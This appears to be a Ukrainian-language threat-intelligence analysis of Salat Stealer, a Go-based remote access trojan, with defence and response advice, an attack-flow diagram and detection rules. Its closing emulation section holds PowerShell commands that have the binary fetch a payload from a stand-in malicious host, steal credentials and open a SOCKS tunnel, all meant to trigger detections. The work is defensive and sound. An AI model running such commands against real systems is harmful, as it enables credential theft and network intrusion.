Аналіз Salat Stealer: Go-основний RAT, стійкість C2 та можливості викрадення інформації
Стежити 
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Salat Stealer – це троянець віддаленого доступу на основі Go, який функціонує як повнофункціональна структура для постексплуатації. Він підтримує кілька каналів зв’язку, включаючи WebSocket, HTTP/2, HTTP/3 і QUIC, що надає операторам гнучкі та надійні варіанти командування і контролю. Шкідливе програмне забезпечення також містить широкі можливості викрадення облікових даних, націлюючись на дані браузера, криптовалютні гаманці, натискання клавіш, знімки екрану та мережеве переключення через SOCKS5. Щоб вижити після перезавантаження, воно використовує приховані копії файлів, заплановані завдання та реєстраційний ключ Run. Якщо його основна інфраструктура порушена, шкідливе програмне забезпечення може отримати оновлені деталі керування та контролю через блокчейн TON.
Розслідування
Аналіз пояснює, як шкідливе програмне забезпечення отримує ключі шифрування зі статичних рядків, поєднаних із ім’ям хоста жертви, а потім використовує їх для дешифрування п’яти вбудованих URL-адрес командування та контролю. Дослідники також задокументували, як Salat Stealer вибирає свій транспортний протокол, обробляє команди операторів, намагається підвищити привілеї та розгортає кілька методів стійкості на хості. У звіті також представлені різні види викрадених даних і ширші функції віддаленого доступу, доступні атакуючому.
Захист
Захисники повинні контролювати з’єднання з виявленими URL-адресами командування та контролю, а також несподіваний трафік QUIC і WebSocket в невідомі місця призначення. Команди безпеки також повинні стежити за прихованими запланованими завданнями та підозрілими записами ключів Run, які вказують на невідомі виконувані файли. Список дозволених програм і суворий контроль виконання можуть допомогти запобігти запуску навантаження на основі Go. Сегментація мережі та перевірка TLS можуть ще більше покращити видимість підозрілого вихідного трафіку, пов’язаного зі шкідливим програмним забезпеченням.
Реагування
Якщо виявлено активність Salat Stealer, негайно ізолюйте уражену систему, зберіть зразки пам’яті та диска та зупиніть шкідливі процеси. Видаліть усі артефакти стійкості, включаючи заплановані завдання, записи ключів Run та приховані копії файлів, які використовуються шкідливим програмним забезпеченням. Виявлені домени командування та керування повинні бути заблоковані разом із будь-якими пов’язаними запитами блокчейну TON, які використовуються для пошуку резервної інфраструктури. Викриті облікові дані та криптовалютні гаманці також слід терміново змінити чи захистити.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccffcc %% Malware definition malware_salatr["<b>Шкідливе ПЗ</b> – <b>Назва</b>: Salat Stealer (Go RAT)<br/><b>Опис</b>: Троянець віддаленого доступу на основі Go, що використовується для крадіжок, стійкості та латерального переміщення."] class malware_salatr malware %% Initial execution process process_start["<b>Процес</b> – <b>Назва</b>: SalatStealer.exe<br/><b>Дія</b>: Запускається, отримує власний шлях, перевіряє наявність існуючого екземпляра, може обійти UAC.<br/><b>Техніка</b>: T1548.002 Bypass User Account Control<br/><b>Техніка</b>: T1027.008 Обфусцировані/Збережені файли"] class process_start process malware_salatr –>|виконує| process_start %% Persistence mechanisms persistence_task["<b>Дія</b> – <b>T1053.005 Scheduled Task</b>: Створює приховане заплановане завдання з маскованою назвою (explorer.exe)."] class persistence_task action persistence_reg["<b>Дія</b> – <b>T1547.001 Ключі реєстру Run / Папка автозапуску</b>: запис HKCURun із замаскованою назвою (svchost.exe)."] class persistence_reg action process_start –>|створює| persistence_task process_start –>|створює| persistence_reg %% Defense evasion defense_evasion["<b>Дія</b> – <b>T1027 Обфусировані файли</b>: Обфускація рядків в шести режимах і похідне ключа для машини."] class defense_evasion action process_start –>|застосовує| defense_evasion %% System discovery discovery["<b>Дія</b> – <b>T1082 Виявлення інформації про систему</b>: Збирає ОС, ЦП, ГПУ, ПАМ’ЯТЬ, назву активного вікна, статус адміністратора і створює ідентифікатор агента."] class discovery action process_start –>|виконує| discovery %% Credential access credential_access["<b>Дія</b> – <b>T1555.003 Облікові дані з веббраузерів</b>: Зливає Chromium, Firefox, Discord, Steam браузери і DPAPIу2011шифровані паролі.<br/><b>Додаткові техніки</b>: T1056.001 Логування клавіш, T1115 Дані буфера обміну."] class credential_access action process_start –>|виконує| credential_access %% Collection of data collection["<b>Дія</b> – <b>T1113 Знімки екрану</b>, <b>T1125 Відеозапис</b>, <b>T1560.001 Архівація за допомогою утиліти</b>: Збирає екран, відео з вебкамери і архівує дані у ZIP файли."] class collection action credential_access –>|збирає| collection %% Command and control c2["<b>Дія</b> – <b>T1071.005 WebSocket</b> і <b>T1071.001 Веб-протокол</b>: Зв’язується по QUIC/WebSocket з зашифрованими URL-адресами; відкатається до альтернативних кінцевих точок та блокчейну TON.<br/><b>Техніка</b>: T1008 Відновлювальні канали"] class c2 action collection –>|виводить через| c2 %% Exfiltration exfiltration["<b>Дія</b> – <b>T1041 Ексфільтрація через C2 канал</b>, <b>T1048 Ексфільтрація через альтернативний протокол</b>, <b>T1020 Автоматизована ексфільтрація</b>: Надсилає архівовані дані та викрадені облікові дані."] class exfiltration action c2 –>|надсилає дані| exfiltration %% Execution of remote commands command_exec["<b>Дія</b> – <b>T1059.003 Оболонка команд в Windows</b>: Приймає та виконує командні інструкції, від атакуючого.<br/><b>Техніка</b>: T1090.001 SOCKS5 проксі для тунелювання."] class command_exec action exfiltration –>|отримує команди| command_exec %% Lateral movement via proxy lateral["<b>Дія</b> – <b>T1090.001 Проксі (SOCKS5)</b>: Створює внутрішній SOCKS5 тунель для переключення та латерального руху."] class lateral action command_exec –>|створює| lateral "
Потік атаки
Виявлення
Підозрілі команди та контроль через запити DNS з незвичними доменами верхнього рівня (через dns)
Перегляд
Можливі точки стійкості [ASEP – Програмне забезпечення/NTUSER Hive] (через registry_event)
Перегляд
Виконання системних процесів з нетипових шляхів (через process_creation)
Перегляд
Індикатори компрометації (HashSha256), щоб виявити: Аналіз Salat Stealer на основі Go RAT C2 Стійкість та можливості викрадення інформації
Перегляд
Індикатори компрометації (HashSha1), щоб виявити: Аналіз Salat Stealer на основі Go RAT C2 Стійкість та можливості викрадення інформації
Перегляд
Індикатори компрометації (HashMd5), щоб виявити: Аналіз Salat Stealer на основі Go RAT C2 Стійкість та можливості викрадення інформації
Перегляд
Виявлення дій Salat Stealer RAT [Windows Sysmon]
Перегляд
Виявлення моделей комунікації Salat Stealer C2 [Windows Network Connection]
Перегляд
Виконання Salat Stealer та виявлення моди [Windows Process Creation]
Перегляд
Імітаційне виконання
Передумова: Телеметрія та перевірка базової лінії повинні бути завершені.
Раціональне пояснення: Цей розділ описує точне виконання техніки противника (TTP), призначеної для виклику правила виявлення. Команди та наратив ПОВИННІ безпосередньо відображати ідентифіковані TTP та націлюватися на створення очікуваної телеметрії детекційною логікою.
-
Наратив атаки та команди:
Зловмисник доставив двійковий файл Salat RAT (salat.exe) на комп’ютер жертви через вкладення в фішинговому листі. Отримавши низькорівневе закріплення, злочинець виконує двійковий файл із певними аргументами, щоб:- Завантажити вторинне навантаження –
main.downloadFile https://malicious.example.com/payload.exe. - Вкрасти збережені облікові дані –
main.Steal -module credentials. - Встановити одноранговий тунель SOCKS для латерального переміщення –
main.p2pSocks -listen 1080 -remote 10.0.0.5:4444.
Двійковий файл запускається з підвищеної сесії PowerShell, щоб задовольнити вимогу підвищення (T1548). Кожне викликання відображається як окремий процес Sysmon зі створенням процесу з відповідною командною лінією, що задовольняє співставлення з рядком правила Sigma.
- Завантажити вторинне навантаження –
-
Скрипт тестування регресії:
# ------------------------------------------------- # Скрипт імітації Salat RAT – викликає виявлення # ------------------------------------------------- $binaryPath = "C:Tempsalat.exe" # Переконайтеся, що двійковий файл існує (плейсхолдер – у реальному тесті двійковий файл буде попередньо підготовлений) if (-Not (Test-Path $binaryPath)) { Write-Error "Двійковий файл Salat не знайдений за адресою $binaryPath" exit 1 } # 1. Завантажити вторинне навантаження Start-Process -FilePath $binaryPath -ArgumentList "main.downloadFile https://malicious.example.com/payload.exe" -Wait # 2. Вкрасти облікові дані Start-Process -FilePath $binaryPath -ArgumentList "main.Steal -module credentials" -Wait # 3. Відкрити P2P SOCKS тунель Start-Process -FilePath $binaryPath -ArgumentList "main.p2pSocks -listen 1080 -remote 10.0.0.5:4444" -Wait Write-Host "Імітація завершена." -
Команди очищення:
# ------------------------------------------------- # Очищення для імітації Salat RAT # ------------------------------------------------- # Завершити будь-які залишкові процеси Salat Get-Process -Name "salat" -ErrorAction SilentlyContinue | Stop-Process -Force # Видалити двійковий файл (якщо дозволено) $binaryPath = "C:Tempsalat.exe" if (Test-Path $binaryPath) { Remove-Item $binaryPath -Force Write-Host "Видалено $binaryPath" } # За необхідності очистити пов’язані події Sysmon з тестового індексу (приклад Splunk) # splunk cmd search '| delete index=main host="test-host" sourcetype="Sysmon" earliest=-24h latest=now'